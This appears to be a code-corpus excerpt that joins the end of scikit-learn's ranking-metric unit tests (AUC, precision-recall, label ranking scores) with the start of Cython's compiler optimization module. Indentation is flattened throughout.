y3 = [2.0, 1.0, 0.5, 0.0, 1.0]
for y in (y1, y2, y3):
assert_array_almost_equal(auc(x, y, reorder=True), 3.0)
def test_auc_errors():
# Incompatible shapes
assert_raises(ValueError, auc, [0.0, 0.5, 1.0], [0.1, 0.2])
# Too few x values
assert_raises(ValueError, auc, [0.0], [0.1])
# x is not in order
assert_raises(ValueError, auc, [1.0, 0.0, 0.5], [0.0, 0.0, 0.0])
def test_auc_score_non_binary_class():
# Test that roc_auc_score function returns an error when trying
# to compute AUC for non-binary class values.
rng = check_random_state(404)
y_pred = rng.rand(10)
# y_true contains only one class value
y_true = np.zeros(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
y_true = np.ones(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
y_true = -np.ones(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
# y_true contains three different class values
y_true = rng.randint(0, 3, size=10)
assert_raise_message(ValueError, "multiclass format is not supported",
roc_auc_score, y_true, y_pred)
clean_warning_registry()
with warnings.catch_warnings(record=True):
rng = check_random_state(404)
y_pred = rng.rand(10)
# y_true contains only one class value
y_true = np.zeros(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
y_true = np.ones(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
y_true = -np.ones(10, dtype="int")
assert_raise_message(ValueError, "ROC AUC score is not defined",
roc_auc_score, y_true, y_pred)
# y_true contains three different class values
y_true = rng.randint(0, 3, size=10)
assert_raise_message(ValueError, "multiclass format is not supported",
roc_auc_score, y_true, y_pred)
def test_precision_recall_curve():
y_true, _, probas_pred = make_prediction(binary=True)
_test_precision_recall_curve(y_true, probas_pred)
# Use {-1, 1} for labels; make sure original labels aren't modified
y_true[np.where(y_true == 0)] = -1
y_true_copy = y_true.copy()
_test_precision_recall_curve(y_true, probas_pred)
assert_array_equal(y_true_copy, y_true)
labels = [1, 0, 0, 1]
predict_probas = [1, 2, 3, 4]
p, r, t = precision_recall_curve(labels, predict_probas)
assert_array_almost_equal(p, np.array([0.5, 0.33333333, 0.5, 1., 1.]))
assert_array_almost_equal(r, np.array([1., 0.5, 0.5, 0.5, 0.]))
assert_array_almost_equal(t, np.array([1, 2, 3, 4]))
assert_equal(p.size, r.size)
assert_equal(p.size, t.size + 1)
def test_precision_recall_curve_pos_label():
y_true, _, probas_pred = make_prediction(binary=False)
pos_label = 2
p, r, thresholds = precision_recall_curve(y_true,
probas_pred[:, pos_label],
pos_label=pos_label)
p2, r2, thresholds2 = precision_recall_curve(y_true == pos_label,
probas_pred[:, pos_label])
assert_array_almost_equal(p, p2)
assert_array_almost_equal(r, r2)
assert_array_almost_equal(thresholds, thresholds2)
assert_equal(p.size, r.size)
assert_equal(p.size, thresholds.size + 1)
def _test_precision_recall_curve(y_true, probas_pred):
# Test Precision-Recall and aread under PR curve
p, r, thresholds = precision_recall_curve(y_true, probas_pred)
precision_recall_auc = auc(r, p)
assert_array_almost_equal(precision_recall_auc, 0.85, 2)
assert_array_almost_equal(precision_recall_auc,
average_precision_score(y_true, probas_pred))
assert_almost_equal(_average_precision(y_true, probas_pred),
precision_recall_auc, 1)
assert_equal(p.size, r.size)
assert_equal(p.size, thresholds.size + 1)
# Smoke test in the case of proba having only one value
p, r, thresholds = precision_recall_curve(y_true,
np.zeros_like(probas_pred))
precision_recall_auc = auc(r, p)
assert_array_almost_equal(precision_recall_auc, 0.75, 3)
assert_equal(p.size, r.size)
assert_equal(p.size, thresholds.size + 1)
def test_precision_recall_curve_errors():
# Contains non-binary labels
assert_raises(ValueError, precision_recall_curve,
[0, 1, 2], [[0.0], [1.0], [1.0]])
def test_precision_recall_curve_toydata():
with np.errstate(all="raise"):
# Binary classification
y_true = [0, 1]
y_score = [0, 1]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [1, 1])
assert_array_almost_equal(r, [1, 0])
assert_almost_equal(auc_prc, 1.)
y_true = [0, 1]
y_score = [1, 0]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [0.5, 0., 1.])
assert_array_almost_equal(r, [1., 0., 0.])
assert_almost_equal(auc_prc, 0.25)
y_true = [1, 0]
y_score = [1, 1]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [0.5, 1])
assert_array_almost_equal(r, [1., 0])
assert_almost_equal(auc_prc, .75)
y_true = [1, 0]
y_score = [1, 0]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [1, 1])
assert_array_almost_equal(r, [1, 0])
assert_almost_equal(auc_prc, 1.)
y_true = [1, 0]
y_score = [0.5, 0.5]
p, r, _ = precision_recall_curve(y_true, y_score)
auc_prc = average_precision_score(y_true, y_score)
assert_array_almost_equal(p, [0.5, 1])
assert_array_almost_equal(r, [1, 0.])
assert_almost_equal(auc_prc, .75)
y_true = [0, 0]
y_score = [0.25, 0.75]
assert_raises(Exception, precision_recall_curve, y_true, y_score)
assert_raises(Exception, average_precision_score, y_true, y_score)
y_true = [1, 1]
y_score = [0.25, 0.75]
p, r, _ = precision_recall_curve(y_true, y_score)
assert_almost_equal(average_precision_score(y_true, y_score), 1.)
assert_array_almost_equal(p, [1., 1., 1.])
assert_array_almost_equal(r, [1, 0.5, 0.])
# Multi-label classification task
y_true = np.array([[0, 1], [0, 1]])
y_score = np.array([[0, 1], [0, 1]])
assert_raises(Exception, average_precision_score, y_true, y_score,
average="macro")
assert_raises(Exception, average_precision_score, y_true, y_score,
average="weighted")
assert_almost_equal(average_precision_score(y_true, y_score,
average="samples"), 1.)
assert_almost_equal(average_precision_score(y_true, y_score,
average="micro"), 1.)
y_true = np.array([[0, 1], [0, 1]])
y_score = np.array([[0, 1], [1, 0]])
assert_raises(Exception, average_precision_score, y_true, y_score,
average="macro")
assert_raises(Exception, average_precision_score, y_true, y_score,
average="weighted")
assert_almost_equal(average_precision_score(y_true, y_score,
average="samples"), 0.625)
assert_almost_equal(average_precision_score(y_true, y_score,
average="micro"), 0.625)
y_true = np.array([[1, 0], [0, 1]])
y_score = np.array([[0, 1], [1, 0]])
assert_almost_equal(average_precision_score(y_true, y_score,
average="macro"), 0.25)
assert_almost_equal(average_precision_score(y_true, y_score,
average="weighted"), 0.25)
assert_almost_equal(average_precision_score(y_true, y_score,
average="samples"), 0.25)
assert_almost_equal(average_precision_score(y_true, y_score,
average="micro"), 0.25)
y_true = np.array([[1, 0], [0, 1]])
y_score = np.array([[0.5, 0.5], [0.5, 0.5]])
assert_almost_equal(average_precision_score(y_true, y_score,
average="macro"), 0.75)
assert_almost_equal(average_precision_score(y_true, y_score,
average="weighted"), 0.75)
assert_almost_equal(average_precision_score(y_true, y_score,
average="samples"), 0.75)
assert_almost_equal(average_precision_score(y_true, y_score,
average="micro"), 0.75)
def test_score_scale_invariance():
# Test that average_precision_score and roc_auc_score are invariant by
# the scaling or shifting of probabilities
y_true, _, probas_pred = make_prediction(binary=True)
roc_auc = roc_auc_score(y_true, probas_pred)
roc_auc_scaled = roc_auc_score(y_true, 100 * probas_pred)
roc_auc_shifted = roc_auc_score(y_true, probas_pred - 10)
assert_equal(roc_auc, roc_auc_scaled)
assert_equal(roc_auc, roc_auc_shifted)
pr_auc = average_precision_score(y_true, probas_pred)
pr_auc_scaled = average_precision_score(y_true, 100 * probas_pred)
pr_auc_shifted = average_precision_score(y_true, probas_pred - 10)
assert_equal(pr_auc, pr_auc_scaled)
assert_equal(pr_auc, pr_auc_shifted)
def check_lrap_toy(lrap_score):
# Check on several small example that it works
assert_almost_equal(lrap_score([[0, 1]], [[0.25, 0.75]]), 1)
assert_almost_equal(lrap_score([[0, 1]], [[0.75, 0.25]]), 1 / 2)
assert_almost_equal(lrap_score([[1, 1]], [[0.75, 0.25]]), 1)
assert_almost_equal(lrap_score([[0, 0, 1]], [[0.25, 0.5, 0.75]]), 1)
assert_almost_equal(lrap_score([[0, 1, 0]], [[0.25, 0.5, 0.75]]), 1 / 2)
assert_almost_equal(lrap_score([[0, 1, 1]], [[0.25, 0.5, 0.75]]), 1)
assert_almost_equal(lrap_score([[1, 0, 0]], [[0.25, 0.5, 0.75]]), 1 / 3)
assert_almost_equal(lrap_score([[1, 0, 1]], [[0.25, 0.5, 0.75]]),
(2 / 3 + 1 / 1) / 2)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.25, 0.5, 0.75]]),
(2 / 3 + 1 / 2) / 2)
assert_almost_equal(lrap_score([[0, 0, 1]], [[0.75, 0.5, 0.25]]), 1 / 3)
assert_almost_equal(lrap_score([[0, 1, 0]], [[0.75, 0.5, 0.25]]), 1 / 2)
assert_almost_equal(lrap_score([[0, 1, 1]], [[0.75, 0.5, 0.25]]),
(1 / 2 + 2 / 3) / 2)
assert_almost_equal(lrap_score([[1, 0, 0]], [[0.75, 0.5, 0.25]]), 1)
assert_almost_equal(lrap_score([[1, 0, 1]], [[0.75, 0.5, 0.25]]),
(1 + 2 / 3) / 2)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.75, 0.5, 0.25]]), 1)
assert_almost_equal(lrap_score([[1, 1, 1]], [[0.75, 0.5, 0.25]]), 1)
assert_almost_equal(lrap_score([[0, 0, 1]], [[0.5, 0.75, 0.25]]), 1 / 3)
assert_almost_equal(lrap_score([[0, 1, 0]], [[0.5, 0.75, 0.25]]), 1)
assert_almost_equal(lrap_score([[0, 1, 1]], [[0.5, 0.75, 0.25]]),
(1 + 2 / 3) / 2)
assert_almost_equal(lrap_score([[1, 0, 0]], [[0.5, 0.75, 0.25]]), 1 / 2)
assert_almost_equal(lrap_score([[1, 0, 1]], [[0.5, 0.75, 0.25]]),
(1 / 2 + 2 / 3) / 2)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.5, 0.75, 0.25]]), 1)
assert_almost_equal(lrap_score([[1, 1, 1]], [[0.5, 0.75, 0.25]]), 1)
# Tie handling
assert_almost_equal(lrap_score([[1, 0]], [[0.5, 0.5]]), 0.5)
assert_almost_equal(lrap_score([[0, 1]], [[0.5, 0.5]]), 0.5)
assert_almost_equal(lrap_score([[1, 1]], [[0.5, 0.5]]), 1)
assert_almost_equal(lrap_score([[0, 0, 1]], [[0.25, 0.5, 0.5]]), 0.5)
assert_almost_equal(lrap_score([[0, 1, 0]], [[0.25, 0.5, 0.5]]), 0.5)
assert_almost_equal(lrap_score([[0, 1, 1]], [[0.25, 0.5, 0.5]]), 1)
assert_almost_equal(lrap_score([[1, 0, 0]], [[0.25, 0.5, 0.5]]), 1 / 3)
assert_almost_equal(lrap_score([[1, 0, 1]], [[0.25, 0.5, 0.5]]),
(2 / 3 + 1 / 2) / 2)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.25, 0.5, 0.5]]),
(2 / 3 + 1 / 2) / 2)
assert_almost_equal(lrap_score([[1, 1, 1]], [[0.25, 0.5, 0.5]]), 1)
assert_almost_equal(lrap_score([[1, 1, 0]], [[0.5, 0.5, 0.5]]), 2 / 3)
assert_almost_equal(lrap_score([[1, 1, 1, 0]], [[0.5, 0.5, 0.5, 0.5]]),
3 / 4)
def check_zero_or_all_relevant_labels(lrap_score):
random_state = check_random_state(0)
for n_labels in range(2, 5):
y_score = random_state.uniform(size=(1, n_labels))
y_score_ties = np.zeros_like(y_score)
# No relevant labels
y_true = np.zeros((1, n_labels))
assert_equal(lrap_score(y_true, y_score), 1.)
assert_equal(lrap_score(y_true, y_score_ties), 1.)
# Only relevant labels
y_true = np.ones((1, n_labels))
assert_equal(lrap_score(y_true, y_score), 1.)
assert_equal(lrap_score(y_true, y_score_ties), 1.)
# Degenerate case: only one label
assert_almost_equal(lrap_score([[1], [0], [1], [0]],
[[0.5], [0.5], [0.5], [0.5]]), 1.)
def check_lrap_error_raised(lrap_score):
# Raise value error if not appropriate format
assert_raises(ValueError, lrap_score,
[0, 1, 0], [0.25, 0.3, 0.2])
assert_raises(ValueError, lrap_score, [0, 1, 2],
[[0.25, 0.75, 0.0], [0.7, 0.3, 0.0], [0.8, 0.2, 0.0]])
assert_raises(ValueError, lrap_score, [(0), (1), (2)],
[[0.25, 0.75, 0.0], [0.7, 0.3, 0.0], [0.8, 0.2, 0.0]])
# Check that that y_true.shape != y_score.shape raise the proper exception
assert_raises(ValueError, lrap_score, [[0, 1], [0, 1]], [0, 1])
assert_raises(ValueError, lrap_score, [[0, 1], [0, 1]], [[0, 1]])
assert_raises(ValueError, lrap_score, [[0, 1], [0, 1]], [[0], [1]])
assert_raises(ValueError, lrap_score, [[0, 1]], [[0, 1], [0, 1]])
assert_raises(ValueError, lrap_score, [[0], [1]], [[0, 1], [0, 1]])
assert_raises(ValueError, lrap_score, [[0, 1], [0, 1]], [[0], [1]])
def check_lrap_only_ties(lrap_score):
# Check tie handling in score
# Basic check with only ties and increasing label space
for n_labels in range(2, 10):
y_score = np.ones((1, n_labels))
# Check for growing number of consecutive relevant
for n_relevant in range(1, n_labels):
# Check for a bunch of positions
for pos in range(n_labels - n_relevant):
y_true = np.zeros((1, n_labels))
y_true[0, pos:pos + n_relevant] = 1
assert_almost_equal(lrap_score(y_true, y_score),
n_relevant / n_labels)
def check_lrap_without_tie_and_increasing_score(lrap_score):
# Check that Label ranking average precision works for various
# Basic check with increasing label space size and decreasing score
for n_labels in range(2, 10):
y_score = n_labels - (np.arange(n_labels).reshape((1, n_labels)) + 1)
# First and last
y_true = np.zeros((1, n_labels))
y_true[0, 0] = 1
y_true[0, -1] = 1
assert_almost_equal(lrap_score(y_true, y_score),
(2 / n_labels + 1) / 2)
# Check for growing number of consecutive relevant label
for n_relevant in range(1, n_labels):
# Check for a bunch of position
for pos in range(n_labels - n_relevant):
y_true = np.zeros((1, n_labels))
y_true[0, pos:pos + n_relevant] = 1
assert_almost_equal(lrap_score(y_true, y_score),
sum((r + 1) / ((pos + r + 1) * n_relevant)
for r in range(n_relevant)))
def _my_lrap(y_true, y_score):
"""Simple implementation of label ranking average precision"""
check_consistent_length(y_true, y_score)
y_true = check_array(y_true)
y_score = check_array(y_score)
n_samples, n_labels = y_true.shape
score = np.empty((n_samples, ))
for i in range(n_samples):
# The best rank correspond to 1. Rank higher than 1 are worse.
# The best inverse ranking correspond to n_labels.
unique_rank, inv_rank = np.unique(y_score[i], return_inverse=True)
n_ranks = unique_rank.size
rank = n_ranks - inv_rank
# Rank need to be corrected to take into account ties
# ex: rank 1 ex aequo means that both label are rank 2.
corr_rank = np.bincount(rank, minlength=n_ranks + 1).cumsum()
rank = corr_rank[rank]
relevant = y_true[i].nonzero()[0]
if relevant.size == 0 or relevant.size == n_labels:
score[i] = 1
continue
score[i] = 0.
for label in relevant:
# Let's count the number of relevant label with better rank
# (smaller rank).
n_ranked_above = sum(rank[r] <= rank[label] for r in relevant)
# Weight by the rank of the actual label
score[i] += n_ranked_above / rank[label]
score[i] /= relevant.size
return score.mean()
def check_alternative_lrap_implementation(lrap_score, n_classes=5,
n_samples=20, random_state=0):
_, y_true = make_multilabel_classification(n_features=1,
allow_unlabeled=False,
random_state=random_state,
n_classes=n_classes,
n_samples=n_samples)
# Score with ties
y_score = sparse_random_matrix(n_components=y_true.shape[0],
n_features=y_true.shape[1],
random_state=random_state)
if hasattr(y_score, "toarray"):
y_score = y_score.toarray()
score_lrap = label_ranking_average_precision_score(y_true, y_score)
score_my_lrap = _my_lrap(y_true, y_score)
assert_almost_equal(score_lrap, score_my_lrap)
# Uniform score
random_state = check_random_state(random_state)
y_score = random_state.uniform(size=(n_samples, n_classes))
score_lrap = label_ranking_average_precision_score(y_true, y_score)
score_my_lrap = _my_lrap(y_true, y_score)
assert_almost_equal(score_lrap, score_my_lrap)
def test_label_ranking_avp():
for fn in [label_ranking_average_precision_score, _my_lrap]:
yield check_lrap_toy, fn
yield check_lrap_without_tie_and_increasing_score, fn
yield check_lrap_only_ties, fn
yield check_zero_or_all_relevant_labels, fn
yield check_lrap_error_raised, label_ranking_average_precision_score
for n_samples, n_classes, random_state in product((1, 2, 8, 20),
(2, 5, 10),
range(1)):
yield (check_alternative_lrap_implementation,
label_ranking_average_precision_score,
n_classes, n_samples, random_state)
def test_coverage_error():
# Toy case
assert_almost_equal(coverage_error([[0, 1]], [[0.25, 0.75]]), 1)
assert_almost_equal(coverage_error([[0, 1]], [[0.75, 0.25]]), 2)
assert_almost_equal(coverage_error([[1, 1]], [[0.75, 0.25]]), 2)
assert_almost_equal(coverage_error([[0, 0]], [[0.75, 0.25]]), 0)
assert_almost_equal(coverage_error([[0, 0, 0]], [[0.25, 0.5, 0.75]]), 0)
assert_almost_equal(coverage_error([[0, 0, 1]], [[0.25, 0.5, 0.75]]), 1)
assert_almost_equal(coverage_error([[0, 1, 0]], [[0.25, 0.5, 0.75]]), 2)
assert_almost_equal(coverage_error([[0, 1, 1]], [[0.25, 0.5, 0.75]]), 2)
assert_almost_equal(coverage_error([[1, 0, 0]], [[0.25, 0.5, 0.75]]), 3)
assert_almost_equal(coverage_error([[1, 0, 1]], [[0.25, 0.5, 0.75]]), 3)
assert_almost_equal(coverage_error([[1, 1, 0]], [[0.25, 0.5, 0.75]]), 3)
assert_almost_equal(coverage_error([[1, 1, 1]], [[0.25, 0.5, 0.75]]), 3)
assert_almost_equal(coverage_error([[0, 0, 0]], [[0.75, 0.5, 0.25]]), 0)
assert_almost_equal(coverage_error([[0, 0, 1]], [[0.75, 0.5, 0.25]]), 3)
assert_almost_equal(coverage_error([[0, 1, 0]], [[0.75, 0.5, 0.25]]), 2)
assert_almost_equal(coverage_error([[0, 1, 1]], [[0.75, 0.5, 0.25]]), 3)
assert_almost_equal(coverage_error([[1, 0, 0]], [[0.75, 0.5, 0.25]]), 1)
assert_almost_equal(coverage_error([[1, 0, 1]], [[0.75, 0.5, 0.25]]), 3)
assert_almost_equal(coverage_error([[1, 1, 0]], [[0.75, 0.5, 0.25]]), 2)
assert_almost_equal(coverage_error([[1, 1, 1]], [[0.75, 0.5, 0.25]]), 3)
assert_almost_equal(coverage_error([[0, 0, 0]], [[0.5, 0.75, 0.25]]), 0)
assert_almost_equal(coverage_error([[0, 0, 1]], [[0.5, 0.75, 0.25]]), 3)
assert_almost_equal(coverage_error([[0, 1, 0]], [[0.5, 0.75, 0.25]]), 1)
assert_almost_equal(coverage_error([[0, 1, 1]], [[0.5, 0.75, 0.25]]), 3)
assert_almost_equal(coverage_error([[1, 0, 0]], [[0.5, 0.75, 0.25]]), 2)
assert_almost_equal(coverage_error([[1, 0, 1]], [[0.5, 0.75, 0.25]]), 3)
assert_almost_equal(coverage_error([[1, 1, 0]], [[0.5, 0.75, 0.25]]), 2)
assert_almost_equal(coverage_error([[1, 1, 1]], [[0.5, 0.75, 0.25]]), 3)
# Non trival case
assert_almost_equal(coverage_error([[0, 1, 0], [1, 1, 0]],
[[0.1, 10., -3], [0, 1, 3]]),
(1 + 3) / 2.)
assert_almost_equal(coverage_error([[0, 1, 0], [1, 1, 0], [0, 1, 1]],
[[0.1, 10, -3], [0, 1, 3], [0, 2, 0]]),
(1 + 3 + 3) / 3.)
assert_almost_equal(coverage_error([[0, 1, 0], [1, 1, 0], [0, 1, 1]],
[[0.1, 10, -3], [3, 1, 3], [0, 2, 0]]),
(1 + 3 + 3) / 3.)
def test_coverage_tie_handling():
assert_almost_equal(coverage_error([[0, 0]], [[0.5, 0.5]]), 0)
assert_almost_equal(coverage_error([[1, 0]], [[0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[0, 1]], [[0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[1, 1]], [[0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[0, 0, 0]], [[0.25, 0.5, 0.5]]), 0)
assert_almost_equal(coverage_error([[0, 0, 1]], [[0.25, 0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[0, 1, 0]], [[0.25, 0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[0, 1, 1]], [[0.25, 0.5, 0.5]]), 2)
assert_almost_equal(coverage_error([[1, 0, 0]], [[0.25, 0.5, 0.5]]), 3)
assert_almost_equal(coverage_error([[1, 0, 1]], [[0.25, 0.5, 0.5]]), 3)
assert_almost_equal(coverage_error([[1, 1, 0]], [[0.25, 0.5, 0.5]]), 3)
assert_almost_equal(coverage_error([[1, 1, 1]], [[0.25, 0.5, 0.5]]), 3)
def test_label_ranking_loss():
assert_almost_equal(label_ranking_loss([[0, 1]], [[0.25, 0.75]]), 0)
assert_almost_equal(label_ranking_loss([[0, 1]], [[0.75, 0.25]]), 1)
assert_almost_equal(label_ranking_loss([[0, 0, 1]], [[0.25, 0.5, 0.75]]),
0)
assert_almost_equal(label_ranking_loss([[0, 1, 0]], [[0.25, 0.5, 0.75]]),
1 / 2)
assert_almost_equal(label_ranking_loss([[0, 1, 1]], [[0.25, 0.5, 0.75]]),
0)
assert_almost_equal(label_ranking_loss([[1, 0, 0]], [[0.25, 0.5, 0.75]]),
2 / 2)
assert_almost_equal(label_ranking_loss([[1, 0, 1]], [[0.25, 0.5, 0.75]]),
1 / 2)
assert_almost_equal(label_ranking_loss([[1, 1, 0]], [[0.25, 0.5, 0.75]]),
2 / 2)
# Undefined metrics - the ranking doesn't matter
assert_almost_equal(label_ranking_loss([[0, 0]], [[0.75, 0.25]]), 0)
assert_almost_equal(label_ranking_loss([[1, 1]], [[0.75, 0.25]]), 0)
assert_almost_equal(label_ranking_loss([[0, 0]], [[0.5, 0.5]]), 0)
assert_almost_equal(label_ranking_loss([[1, 1]], [[0.5, 0.5]]), 0)
assert_almost_equal(label_ranking_loss([[0, 0, 0]], [[0.5, 0.75, 0.25]]),
0)
assert_almost_equal(label_ranking_loss([[1, 1, 1]], [[0.5, 0.75, 0.25]]),
0)
assert_almost_equal(label_ranking_loss([[0, 0, 0]], [[0.25, 0.5, 0.5]]),
0)
assert_almost_equal(label_ranking_loss([[1, 1, 1]], [[0.25, 0.5, 0.5]]), 0)
# Non trival case
assert_almost_equal(label_ranking_loss([[0, 1, 0], [1, 1, 0]],
[[0.1, 10., -3], [0, 1, 3]]),
(0 + 2 / 2) / 2.)
assert_almost_equal(label_ranking_loss(
[[0, 1, 0], [1, 1, 0], [0, 1, 1]],
[[0.1, 10, -3], [0, 1, 3], [0, 2, 0]]),
(0 + 2 / 2 + 1 / 2) / 3.)
assert_almost_equal(label_ranking_loss(
[[0, 1, 0], [1, 1, 0], [0, 1, 1]],
[[0.1, 10, -3], [3, 1, 3], [0, 2, 0]]),
(0 + 2 / 2 + 1 / 2) / 3.)
# Sparse csr matrices
assert_almost_equal(label_ranking_loss(
csr_matrix(np.array([[0, 1, 0], [1, 1, 0]])),
[[0.1, 10, -3], [3, 1, 3]]),
(0 + 2 / 2) / 2.)
def test_ranking_appropriate_input_shape():
# Check that that y_true.shape != y_score.shape raise the proper exception
assert_raises(ValueError, label_ranking_loss, [[0, 1], [0, 1]], [0, 1])
assert_raises(ValueError, label_ranking_loss, [[0, 1], [0, 1]], [[0, 1]])
assert_raises(ValueError, label_ranking_loss,
[[0, 1], [0, 1]], [[0], [1]])
assert_raises(ValueError, label_ranking_loss, [[0, 1]], [[0, 1], [0, 1]])
assert_raises(ValueError, label_ranking_loss,
[[0], [1]], [[0, 1], [0, 1]])
assert_raises(ValueError, label_ranking_loss, [[0, 1], [0, 1]], [[0], [1]])
def test_ranking_loss_ties_handling():
# Tie handling
assert_almost_equal(label_ranking_loss([[1, 0]], [[0.5, 0.5]]), 1)
assert_almost_equal(label_ranking_loss([[0, 1]], [[0.5, 0.5]]), 1)
assert_almost_equal(label_ranking_loss([[0, 0, 1]], [[0.25, 0.5, 0.5]]),
1 / 2)
assert_almost_equal(label_ranking_loss([[0, 1, 0]], [[0.25, 0.5, 0.5]]),
1 / 2)
assert_almost_equal(label_ranking_loss([[0, 1, 1]], [[0.25, 0.5, 0.5]]), 0)
assert_almost_equal(label_ranking_loss([[1, 0, 0]], [[0.25, 0.5, 0.5]]), 1)
assert_almost_equal(label_ranking_loss([[1, 0, 1]], [[0.25, 0.5, 0.5]]), 1)
assert_almost_equal(label_ranking_loss([[1, 1, 0]], [[0.25, 0.5, 0.5]]), 1)
| bsd-3-clause |
ltilve/ChromiumGStreamerBackend | third_party/cython/src/Cython/Compiler/Optimize.py | 87 | 157730 | from Cython.Compiler import TypeSlots
from Cython.Compiler.ExprNodes import not_a_constant
import cython
cython.declare(UtilityCode=object, EncodedString=object, BytesLiteral=object,
Nodes=object, ExprNodes=object, PyrexTypes=object, Builtin=object,
UtilNodes=object, Naming=object)
import Nodes
import ExprNodes
import PyrexTypes
import Visitor
import Builtin
import UtilNodes
import Options
import Naming
from Code import UtilityCode
from StringEncoding import EncodedString, BytesLiteral
from Errors import error
from ParseTreeTransforms import SkipDeclarations
import copy
import codecs
try:
from __builtin__ import reduce
except ImportError:
from functools import reduce
try:
from __builtin__ import basestring
except ImportError:
basestring = str # Python 3
def load_c_utility(name):
return UtilityCode.load_cached(name, "Optimize.c")
def unwrap_coerced_node(node, coercion_nodes=(ExprNodes.CoerceToPyTypeNode, ExprNodes.CoerceFromPyTypeNode)):
if isinstance(node, coercion_nodes):
return node.arg
return node
def unwrap_node(node):
while isinstance(node, UtilNodes.ResultRefNode):
node = node.expression
return node
def is_common_value(a, b):
a = unwrap_node(a)
b = unwrap_node(b)
if isinstance(a, ExprNodes.NameNode) and isinstance(b, ExprNodes.NameNode):
return a.name == b.name
if isinstance(a, ExprNodes.AttributeNode) and isinstance(b, ExprNodes.AttributeNode):
return not a.is_py_attr and is_common_value(a.obj, b.obj) and a.attribute == b.attribute
return False
def filter_none_node(node):
if node is not None and node.constant_result is None:
return None
return node
class IterationTransform(Visitor.EnvTransform):
"""Transform some common for-in loop patterns into efficient C loops:
- for-in-dict loop becomes a while loop calling PyDict_Next()
- for-in-enumerate is replaced by an external counter variable
- for-in-range loop becomes a plain C for loop
"""
def visit_PrimaryCmpNode(self, node):
if node.is_ptr_contains():
# for t in operand2:
# if operand1 == t:
# res = True
# break
# else:
# res = False
pos = node.pos
result_ref = UtilNodes.ResultRefNode(node)
if isinstance(node.operand2, ExprNodes.IndexNode):
base_type = node.operand2.base.type.base_type
else:
base_type = node.operand2.type.base_type
target_handle = UtilNodes.TempHandle(base_type)
target = target_handle.ref(pos)
cmp_node = ExprNodes.PrimaryCmpNode(
pos, operator=u'==', operand1=node.operand1, operand2=target)
if_body = Nodes.StatListNode(
pos,
stats = [Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=1)),
Nodes.BreakStatNode(pos)])
if_node = Nodes.IfStatNode(
pos,
if_clauses=[Nodes.IfClauseNode(pos, condition=cmp_node, body=if_body)],
else_clause=None)
for_loop = UtilNodes.TempsBlockNode(
pos,
temps = [target_handle],
body = Nodes.ForInStatNode(
pos,
target=target,
iterator=ExprNodes.IteratorNode(node.operand2.pos, sequence=node.operand2),
body=if_node,
else_clause=Nodes.SingleAssignmentNode(pos, lhs=result_ref, rhs=ExprNodes.BoolNode(pos, value=0))))
for_loop = for_loop.analyse_expressions(self.current_env())
for_loop = self.visit(for_loop)
new_node = UtilNodes.TempResultFromStatNode(result_ref, for_loop)
if node.operator == 'not_in':
new_node = ExprNodes.NotNode(pos, operand=new_node)
return new_node
else:
self.visitchildren(node)
return node
def visit_ForInStatNode(self, node):
self.visitchildren(node)
return self._optimise_for_loop(node, node.iterator.sequence)
def _optimise_for_loop(self, node, iterator, reversed=False):
if iterator.type is Builtin.dict_type:
# like iterating over dict.keys()
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_dict_iteration(
node, dict_obj=iterator, method=None, keys=True, values=False)
# C array (slice) iteration?
if iterator.type.is_ptr or iterator.type.is_array:
return self._transform_carray_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.bytes_type:
return self._transform_bytes_iteration(node, iterator, reversed=reversed)
if iterator.type is Builtin.unicode_type:
return self._transform_unicode_iteration(node, iterator, reversed=reversed)
# the rest is based on function calls
if not isinstance(iterator, ExprNodes.SimpleCallNode):
return node
if iterator.args is None:
arg_count = iterator.arg_tuple and len(iterator.arg_tuple.args) or 0
else:
arg_count = len(iterator.args)
if arg_count and iterator.self is not None:
arg_count -= 1
function = iterator.function
# dict iteration?
if function.is_attribute and not reversed and not arg_count:
base_obj = iterator.self or function.obj
method = function.attribute
# in Py3, items() is equivalent to Py2's iteritems()
is_safe_iter = self.global_scope().context.language_level >= 3
if not is_safe_iter and method in ('keys', 'values', 'items'):
# try to reduce this to the corresponding .iter*() methods
if isinstance(base_obj, ExprNodes.SimpleCallNode):
inner_function = base_obj.function
if (inner_function.is_name and inner_function.name == 'dict'
and inner_function.entry
and inner_function.entry.is_builtin):
# e.g. dict(something).items() => safe to use .iter*()
is_safe_iter = True
keys = values = False
if method == 'iterkeys' or (is_safe_iter and method == 'keys'):
keys = True
elif method == 'itervalues' or (is_safe_iter and method == 'values'):
values = True
elif method == 'iteritems' or (is_safe_iter and method == 'items'):
keys = values = True
if keys or values:
return self._transform_dict_iteration(
node, base_obj, method, keys, values)
# enumerate/reversed ?
if iterator.self is None and function.is_name and \
function.entry and function.entry.is_builtin:
if function.name == 'enumerate':
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_enumerate_iteration(node, iterator)
elif function.name == 'reversed':
if reversed:
# CPython raises an error here: not a sequence
return node
return self._transform_reversed_iteration(node, iterator)
